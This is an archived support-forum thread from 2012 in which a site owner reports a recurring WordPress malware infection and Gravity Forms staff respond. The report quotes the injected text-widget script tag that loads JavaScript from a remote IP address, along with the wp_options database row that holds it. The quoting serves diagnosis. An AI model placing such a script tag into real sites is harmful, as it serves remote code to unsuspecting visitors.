https://legacy.forums.gravityhelp.com/topic/possible-exploit Gravity Support Forums Topic: Possible exploit? en-US Sat, 18 Apr 2026 16:28:32 +0000 http://bbpress.org/?v=1.0.1 q https://legacy.forums.gravityhelp.com/search.php https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91622 Thu, 15 Nov 2012 18:50:47 +0000 David Smith 91622@https://legacy.forums.gravityhelp.com/ <p>Hi ionata,</p> <p>It looks like whatever this is is adding a text widget to your sidebar. Is Gravity Forms the last item in the sidebar? If so, there is a good chance it is just coincidentally under the Gravity Form widget.</p> <p>Hopefully the logging will provide more information on what event is triggering the injection and we can dig into this more from there. </p> https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91430 Thu, 15 Nov 2012 08:19:24 +0000 Chris Hajer 91430@https://legacy.forums.gravityhelp.com/ <p>I'll bring this to the attention of the developers to see if they can spot anything in your report related to Gravity Forms. Thank you. </p> https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91301 Thu, 15 Nov 2012 01:40:53 +0000 ionata 91301@https://legacy.forums.gravityhelp.com/ <p>Hey guys.</p> <p>We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.</p> <p>It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:</p> <pre><code>&lt;div class=&quot;textwidget&quot;&gt; &lt;script type=&quot;text/javascript&quot; src=&quot;http://61.19.251.27/web/cb.php&quot;&gt;&lt;/script&gt; &lt;/div&gt;</code></pre> <p>Which, in the DB can be seen as: </p> <p>'mysql&gt; select * from wp_options where option_value like "%http://61.19.251.27/web/cb.php%";<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> | option_id | option_name | option_value | autoload |<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> | 87 | widget_text | a:3:{i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";b:0;}i:7;a:3:{s:5:"title";s:1:" ";s:4:"text";s:78:"&lt;script type="text/javascript" src="http://61.19.251.27/web/cb.php"&gt;&lt;/script&gt;";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;} | yes |<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> 1 row in set (0.00 sec)'</p> <p>It's not a lot of information but its all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble. </p> <p>I've bumped up the logging for this site so that if it happens again we might get a better lock on it. Also this is not an on-disk attack, that is to say that no files are modified. So the injection is done through wordpress itself. It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it . </p>